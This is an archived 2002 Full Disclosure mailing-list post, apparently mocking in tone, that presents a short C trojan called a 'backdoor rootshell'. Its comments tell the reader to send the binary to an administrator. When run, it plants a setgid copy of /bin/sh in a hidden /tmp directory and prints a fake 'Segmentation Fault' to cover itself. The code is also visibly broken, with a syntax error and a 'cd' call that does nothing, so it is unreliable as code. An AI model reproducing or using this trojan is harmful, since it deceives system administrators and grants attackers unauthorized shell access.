Full Disclosure mailing list archives
[ElectronicSouls] - Advances in Hacking
From: es () hush com
Date: Thu, 28 Nov 2002 22:28:40 -0800
-----BEGIN PGP SIGNED MESSAGE----- Dear List, Most do not understand the serious problems that arrise when a root user can be tricked into executing a binary created by a malicious local user on the system. We've developed a sure-fire way to get root under these conditions, which the following code demonstrates. # cat ES_BD.c /* ** !!!!!! CRAPPY CODE ALERT !!!!!! ** ** ElectronicSouls Backdoor rootshell ** Morpho (c) ElectronicSouls ** ** USAGE: compile and send the binary to the admin ** if he's stupid enought to execute it it will place a rootshell ** in /tmp/.../ just execute .bd and your root. ** ** ** Creditz to CraigTM. He made a similiar program. ** He also came up with this idea. ** ** Main reason why i wrote this is to test my C skillz wich ** are almost completely 0 lol ** ** Second is cause i saw it as shell script on the FTP ** wich means if the admin views the script he can see what it does ** */ #include <stdio.h> main() { system("touch core"); system("mkdir /tmp/..."); system("cd /tmp/..."); system{"cp /bin/sh /tmp/.../.bd"); system("chgrp root /tmp/.../.bd"); system("chmod 2755 /tmp/.../.bd"); printf("Segmentation Fault"); } # The Electronic Souls Crew [ElectronicSouls] (c) 2002 "jduck is our leader." -----BEGIN PGP SIGNATURE----- Version: Hush 2.2 (Java) Note: This signature can be verified at https://www.hushtools.com/verify wlMEARECABMFAj3nCScMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltFF8An3g+9xLpeaWR Rz0mjlyf0o/ti554AJ0WHH1nj+XS0ZQTaosNkkkAIKoxqA== =60nq -----END PGP SIGNATURE----- Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Big $$$ to be made with the HushMail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- [ElectronicSouls] - Advances in Hacking es (Nov 28)